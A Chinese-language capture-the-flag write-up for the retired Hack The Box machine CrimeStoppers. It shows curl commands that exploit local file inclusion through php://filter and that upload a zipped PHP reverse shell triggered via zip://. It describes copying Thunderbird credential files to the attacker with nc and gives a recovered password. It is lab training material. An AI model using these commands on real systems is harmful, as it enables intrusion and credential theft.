HTB-靶機-CrimeStoppers
本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關
靶機是作者購買VIP使用退役靶機操作,顯示IP地址為10.10.10.80
本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描
執行命令autorecon 10.10.10.80 -o ./CrimeStoppers-autorecon
掃描結果:
就開了一個web應用80埠,訪問看看
再看看爆破出來的目錄
都訪問了一邊發現很多訪問的url地址都是類似帶?op= 懷疑存在LFI,試了試%00截斷進行檔案包含,發現目標靶機有防護不能正常利用,經過多次測試和網上的資料確認可以通過php://filter/convert.base64-encode 進行繞過防護任意檔案讀取,相關參考文章如下:
https://pure.security/abusing-php-wrappers/
既然可以讀取任意檔案,那我們通過讀取上面掃描出來的檔案,通過分析得出可以上傳反彈shell程式碼然後使用zip的方式執行命令,具體讀取方式如下:
curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=index | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > index.php curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=list | head -44 | tail -1 | cut -d'' -f1 | base64 -d > list.php curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=upload | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > upload.php curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=common | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > common.php
重點程式碼:
上傳php反彈shell程式碼或者上傳一句話都可以,這裡有兩種方式,具體如下:
1.使用curl引數上傳,詳細的引數說明請一定要參考官方幫助文件
獲取session和token curl -sD - http://10.10.10.80/?op=upload | grep -e PHPSESSID -e 'name="token"' 如果想檢視curl執行的http請求包,可以本地開啟burpsuite然後 -x 127.0.0.1:8080 執行上面會得出下面結果 Set-Cookie: PHPSESSID=0kbemel0dpno38a45r0p5s43u6; path=/ <input type="text" id="token" name="token" style="display: none" value="3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" style="width:355px;" /> ----------------------------------------------------------------------------------- curl -X POST -sD - -F "tip=<shell1.zip" -F "name=a" -F "token=3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" -F "submit=Send Tip!" http://10.10.10.80/?op=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=0kbemel0dpno38a45r0p5s43u6" | grep Location 上述執行結果如下: Location: ?op=view&secretname=5a482dc8883f2861d601f95b7f64b65a7402b1cf http://10.10.10.80/?op=zip://uploads/10.10.14.5/5a482dc8883f2861d601f95b7f64b65a7402b1cf%23shell1
上述操作完畢就得到了上傳的路徑檔案,然後可以開始利用了,本地kali監聽8833埠,然後觸發反彈程式碼
成功反彈,這裡使用通過curl命令直接反彈shell
2.使用burpsuite上傳小馬程式碼
這裡相對來說,我認為使用burpsuite方式更簡單,在使用的時候一定要記得是需要開啟burpsuite的攔截模式然後在瀏覽器頁面進行上傳,此時burpsuite會攔截上傳資料包,然後使用貼上到檔案,此時選擇實現打包好的zip檔案,完成之後Forward,會獲得上傳的檔案路徑,利用即可
點選Forward即可轉發到上傳的檔案路徑
到了此處就可以像上面curl的演示一樣,使用zip命令觸發即可,下面就不演示了,跟上面一樣,繼續下面的旅程,拿到shell之後升級成tty-shell然後翻看了下家目錄的所有檔案和資料夾,發現一個雷鳥郵件客戶端
經過查詢確認可以通過key3.db和logins.json這兩個檔案來獲取密碼,使用nc將這兩個檔案傳到本地kali,然後使用開源的工具讀取密碼,連結地址:https://github.com/lclevy/firepwd
得出了使用者dom的密碼是Gummer59 直接su切換過去
通過讀取雷鳥客戶端中的郵件內容,確認目標主機存在apache rootkit後門,具體分析參考:https://0xdf.gitlab.io/2018/06/03/htb-crimestoppers.html#apache_modrootme
最終通過下面方式獲取root許可權